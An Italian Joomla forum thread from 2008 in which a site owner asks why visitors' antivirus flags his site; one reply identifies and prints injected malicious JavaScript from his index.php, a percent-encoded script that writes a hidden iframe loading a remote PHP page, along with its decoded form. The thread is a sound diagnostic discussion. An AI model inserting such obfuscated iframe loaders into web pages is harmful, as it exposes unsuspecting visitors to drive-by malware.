Joomla.it Forum

Joomla! 1.5.x (versione con supporto terminato) => Joomla! 1.5 => : morcas 19 Nov 2008, 19:25:46

: Antivirus su sito internet?
: morcas 19 Nov 2008, 19:25:46

Ciao a tutti avrei una curiosità da chiedervi.

Ho un sito www.theskullsclan.com, con joomla 1.5.7, forum in bridge phpbb3. Alcuni utenti rilevano un malware sul mio sito che ne blocca la navigazione.
Il mio hosting è aruba.

Sapete per caso dell'esistenza di qualche tools o antivirus o pagina internet, tramite il quale si può lanciare una scansione sul mio sito internet?
Grazie
Morcas

: Re: Antivirus su sito internet?
: 56francesco 19 Nov 2008, 19:35:07

sarà qualche componente in conflitto, fatti dire che browser usa chi ti ha segnalato il problema?
tu ad esempio lo vedi bene? con che browser?

: Re: Antivirus su sito internet?
: morcas 19 Nov 2008, 21:29:55

io utilizzo sia explorer che firefox e non ho questo problema.

Dovrebbe essere una questione di antivirus. Almeno credo.
Potrebbero essere i robot sul forum phpbb?

: Re: Antivirus su sito internet?
: maicolstaip 19 Nov 2008, 23:11:34

Ciao,
prova a togliere Shinystat

: Re: Antivirus su sito internet?
: gagne 19 Nov 2008, 23:31:18

credo che puo essere il player che usi sul sito

: Re: Antivirus su sito internet?
: Wiliamaxl 20 Nov 2008, 00:17:44

Ciao,
io uso avg 8 che nelle ricerche su google mi da verifica dei siti che contengono mincacce, nella ricerca del tuo sito mi dice che è sicuro...

Ciao

: Re: Antivirus su sito internet?
: morcas 21 Nov 2008, 21:26:33

Grazie per le risposte. Ma a voi il mio sito vi segnala la presenza di qualche virus?

: Re: Antivirus su sito internet?
: maicolstaip 21 Nov 2008, 22:18:34

Ciao,
guarda in fondo il tuo index.php.
C'è questo codice che sicuramente non hai messo tu:

:

<script language="javascript">
document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%78%6F%6E%6C%69%6E%65%2E%65%6F%66%2E%68%75%2F%31%35%2F%6A%73%5F%67%6F%5F%66%31%2E%70%68%70%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) );
</script>
Il codice è criptato e crea un iframe nella pagina:

:

<script language="javascript">
document.write( unescape( '<iframe src="http://sexonline.eof.hu/15/js_go_f1.php" style="display:none"></iframe>' ) );
</script>
La decriptazione è stata fatta in questa pagina:
http://scriptasylum.com/tutorials/encdec/encode-decode.html

Mi sembra di aver incontrato qualcosa di simile un paio di anni  fa in un sito fatto con mambo ed avevo risolto editando tutte le pagine a mano e facendo l'aggiornamento all'ultima versione disponibile, perchè l'iframe era stato inserito sfruttando una vulnerabilità di mambo che io ovviamente avevo sottovalutato.

Ciao